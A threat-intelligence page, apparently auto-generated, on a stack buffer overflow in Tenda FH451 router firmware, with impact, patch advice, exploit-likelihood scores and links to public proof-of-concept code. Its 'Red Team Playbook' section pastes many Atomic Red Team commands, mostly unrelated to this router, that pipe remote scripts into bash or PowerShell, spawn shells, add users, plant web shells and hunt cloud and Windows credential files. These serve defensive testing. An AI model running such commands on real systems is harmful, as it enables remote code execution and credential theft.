CVE-2025-7795
Overview
The vulnerability is a stack-based buffer overflow occurring in the fromP2pListFilter function within the /goform/P2pListFilter component of Tenda FH451 firmware version 1.0.0.9. The root cause stems from improper handling and validation of the 'page' argument, allowing excessive data to overwrite the stack buffer. This flaw arises due to insufficient boundary checks on user-supplied input within the affected function.
Vulnerability Description
A vulnerability, which was classified as critical, has been found in Tenda FH451 1.0.0.9. Affected by this issue is the function fromP2pListFilter of the file /goform/P2pListFilter. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
Impact
An attacker with network access and low privileges can remotely exploit this vulnerability by sending crafted requests to the /goform/P2pListFilter endpoint, manipulating the 'page' parameter to trigger a stack buffer overflow. This can lead to arbitrary code execution with high impact on confidentiality, integrity, and availability (CVSS 8.8, AV:N/AC:L/PR:L/UI:N). The vulnerability enables attackers to compromise device functionality, potentially leading to full system control or denial of service, affecting network security and device reliability.
Solution
Users of Tenda FH451 firmware version 1.0.0.9 should apply the vendor-released firmware update that addresses this stack-based buffer overflow vulnerability. Detailed remediation instructions and patch availability are documented in the advisory referenced at https://vuldb.com/?id.316856. It is recommended to upgrade to the fixed firmware version as specified by Tenda to eliminate this vulnerability and prevent exploitation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in the Tenda FH451 router firmware version 1.0.0.9, specifically within the function responsible for filtering peer-to-peer (P2P) lists. This issue arises from improper handling of user-supplied input, leading to a stack-based buffer overflow when the argument "page" is manipulated. The stack-based buffer overflow occurs when the input exceeds the allocated buffer size, allowing an attacker to overwrite adjacent memory locations. This can potentially lead to arbitrary code execution, enabling unauthorized access to the device or the execution of malicious commands.
The exploitation of this vulnerability can be executed remotely, making it particularly concerning for users of the affected router. An attacker could craft a specially designed request to the vulnerable function, triggering the buffer overflow and gaining control over the device. This could be achieved through various means, such as sending a malicious HTTP request to the router's web interface. Given the widespread use of consumer-grade routers and their often limited security configurations, the potential for exploitation is significant. Attackers may leverage this vulnerability to launch further attacks within the local network, intercept traffic, or compromise connected devices.
The real-world impact of this vulnerability is substantial, particularly for small businesses and home users who may rely on the Tenda FH451 router for their internet connectivity. If exploited, an attacker could gain control over the router, leading to unauthorized access to sensitive information, interception of communications, and potential lateral movement within the network. The business risk includes not only the potential for data breaches but also reputational damage, loss of customer trust, and financial implications associated with remediation efforts. Organizations may face regulatory scrutiny if sensitive data is compromised, further amplifying the risks associated with this vulnerability.
To detect and mitigate this vulnerability, organizations should implement several strategies. Regularly updating router firmware is crucial, as manufacturers often release patches to address known vulnerabilities. Users should be encouraged to monitor vendor communications for updates and apply them promptly. Additionally, employing network segmentation can help isolate critical systems from less secure devices, reducing the attack surface. Implementing intrusion detection systems (IDS) can also aid in identifying unusual traffic patterns indicative of exploitation attempts. Finally, educating users about secure configurations and the importance of changing default credentials can further enhance the security posture against such vulnerabilities.
In conclusion, the critical vulnerability in the Tenda FH451 router firmware poses significant risks to users and organizations alike. The potential for remote exploitation through a stack-based buffer overflow highlights the importance of proactive security measures. By understanding the technical details, attack vectors, and real-world implications, stakeholders can better prepare for and mitigate the risks associated with this vulnerability. Continuous vigilance, timely updates, and user education are essential components of a robust cybersecurity strategy in the face of evolving threats.
CSURFACE threat intelligence has identified a significant increase in the Exploit Prediction Scoring System (EPSS) for CVE-2025-7795, rising by over 46% to a current score placing it within the 95th percentile of predicted exploitation likelihood. This upward adjustment reflects growing confidence in the exploitability of the Tenda FH451 stack-based buffer overflow vulnerability, corroborated by the availability of public proof-of-concept exploits that demonstrate reliable remote triggering and impact verification. Although the short-term trend remains stable without rapid escalation, the elevated EPSS score signals a heightened probability of active exploitation attempts in operational environments. For defenders, this shift underscores an increased urgency to monitor for exploitation indicators and reassess exposure, especially given the remote attack vector and the critical nature of the vulnerability. Consequently, the overall threat level for CVE-2025-7795 should be considered elevated, with a greater likelihood of adversaries leveraging this flaw in targeted or opportunistic campaigns.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Tenda | Fh451 Firmware | 1.0.0.9 |
cpe:2.3:o:tenda:fh451_firmware:1.0.0.9:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow | Byte Reaper | remote | multiple | - | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
byteReaper77/CVE-2025-7795
Proof-of-Concept exploit for CVE-2025-7795 – A buffer overflow vulnerability affecting certain Tenda routers. The exploi...
|
byteReaper77 | 2 | 0 | 2025-07-19 | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-7795 |
| vuldb.com |
GitHub CVE
vdb-entry
technical-description
|
https://vuldb.com/?id.316856 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.316856 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.616344 |
| github.com |
GitHub CVE
related
|
https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromP2pListFilter.md |
| github.com |
GitHub CVE
exploit
|
https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromP2pListFilter.md#poc |
| tenda.com.cn |
GitHub CVE
product
|
https://www.tenda.com.cn/ |